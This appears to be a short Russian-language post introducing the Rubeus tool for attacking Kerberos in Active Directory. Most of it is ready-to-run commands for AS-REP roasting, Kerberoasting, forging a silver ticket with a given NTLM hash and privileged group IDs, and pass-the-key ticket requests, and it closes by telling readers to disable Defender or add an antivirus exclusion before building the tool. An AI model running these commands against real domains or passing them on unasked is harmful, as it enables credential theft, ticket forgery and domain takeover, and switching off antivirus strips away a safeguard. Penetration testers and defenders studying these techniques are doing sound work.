С его помощью можно совершать следующие действия:
⏺️Запросы и продление билетов
⏺️Злоупотреблять делегированием
⏺️Подделывать билеты
⏺️Управлять билетами
⏺️Извлекать и собирать билеты
⏺️Получать учетные данные через Roasting
Рассмотрим некоторые возможности Rubeus:
1️⃣ Проведение атаки AS-REP Roasting — получаем AS-REP сообщение от имени пользователя, у которого установлен флаг “Не требовать предварительной аутентификации Kerberos”
Rubeus.exe asreproast /nowrap
2️⃣ Kerberoasting — получение TGS билета учетной записи, имеющей SPN.
Rubeus.exe kerberoast /nowrap
3️⃣ Silver ticket — возможность сгенерировать TGS билет на имя любого пользователя с указанием любых разрешений, если у атакующего есть пароль учетной записи службы или его NTLM хеш.
Rubeus.exe silver /user:user /service:HTTP/Domain.Local /rc4:5a1caa1361243172e25d437573c67b28 /ldap /groups: 518,519,512,520,513 -user-id 1601 /nowrap /ptt
4️⃣ Pass The Key — имея хеш пароля пользователя можем получить его TGT билет. Для этого сначала вычисляем RC4, AES128 или AES256 ключ, зная учетные данные пользователя. Затем запрашиваем сам билет.
Rubeus.exe hash /domain:Domain.Local /user:user1 /password:qwerty123!
Rubeus.exe asktgt /user:s.user1 /rc4:5a1caa1361243172e25d437573c67b28 /nowrap
Для использования утилиты необходимо скачать исходный код по ссылке. Затем собрать её, например в Visual Studio, предварительно отключив Defender, либо добавить каталог с проектом в исключения антивируса.
